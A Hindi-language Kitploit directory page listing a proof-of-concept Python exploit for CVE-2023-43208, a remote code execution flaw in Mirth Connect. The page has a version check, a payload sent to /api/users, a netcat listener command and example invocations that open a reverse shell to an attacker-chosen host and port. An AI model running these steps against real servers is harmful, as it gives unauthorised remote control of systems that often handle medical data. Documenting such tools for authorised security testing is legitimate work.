Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-43208 — CVE-2023-43208 RCE शोषण के लिए PoC। | Kitploit
उपकरण/GitHubGitHub/predyy/cve-2023-43208
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubpredyy/cve-2023-43208

CVE-2023-43208

CVE-2023-43208 RCE शोषण के लिए PoC।

रिपॉजिटरी देखें
116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-43208 Mirth Connect RCE PoC

प्रूफ-ऑफ-कॉन्सेप्ट पायथन स्क्रिप्ट जो Mirth Connect में CVE-2023-43208 को लक्षित करती है।

अस्वीकरण

केवल उन वातावरणों में उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आप स्पष्ट रूप से अधिकृत हैं। यह रिपॉजिटरी सुरक्षा अनुसंधान, सत्यापन और रक्षात्मक परीक्षण के लिए है। लेखक इस उपकरण द्वारा किए गए किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।

अवलोकन

exp.py PoC का एक न्यूनतम-निर्भरता संस्करण है जो:

  • पता लगाता है कि लक्ष्य Mirth Connect इंस्टेंस प्रतीत होता है या नहीं
  • /api/server/version से Mirth Connect संस्करण का अनुरोध करता है
  • जांचता है कि संस्करण 4.4.1 से कम है या नहीं
  • यदि लक्ष्य संवेदनशील प्रतीत होता है तो /api/users पर एक XML पेलोड भेजता है

स्क्रिप्ट डिफ़ॉल्ट रूप से HTTPS का उपयोग करती है और --http के साथ पर स्विच की जा सकती है।

HTTP

उपयोग

root@kitploit:~
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]

तर्क

  • -u, --url: लक्ष्य Mirth Connect URL या होस्ट
  • -lh, --lhost: रिवर्स कनेक्शन के लिए स्थानीय होस्ट/IP
  • -lp, --lport: स्थानीय सुनने का पोर्ट
  • --http: HTTPS के बजाय HTTP बलपूर्वक उपयोग करें (डिफ़ॉल्ट HTTPS है)

उदाहरण

पहले एक लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 4444

स्क्रिप्ट चलाएँ:

root@kitploit:~
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444

HTTP-मात्र लक्ष्य के लिए:

root@kitploit:~
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http

नोट्स

  • स्क्रिप्ट में SSL प्रमाणपत्र सत्यापन अक्षम है।
  • पेलोड भेजने से पहले स्क्रिप्ट पुष्टि के लिए संकेत देती है।
  • संस्करण का पता लगाना 4.4.1 के विरुद्ध सिमैंटिक तुलना पर आधारित है।
  • जो लक्ष्य Mirth Connect के रूप में पहचाना जाता है, उसके शोषण की गारंटी नहीं है (नेटवर्क, वातावरण और रनटाइम अंतर परिणामों को प्रभावित कर सकते हैं)।

श्रेय

  • मूल भेद्यता खोज: IHTeam
  • मूल कोड: K3ysTr0K3R और Chocapikk
  • न्यूनतम निर्भरता संस्करण: predyy
टूल डाउनलोड करें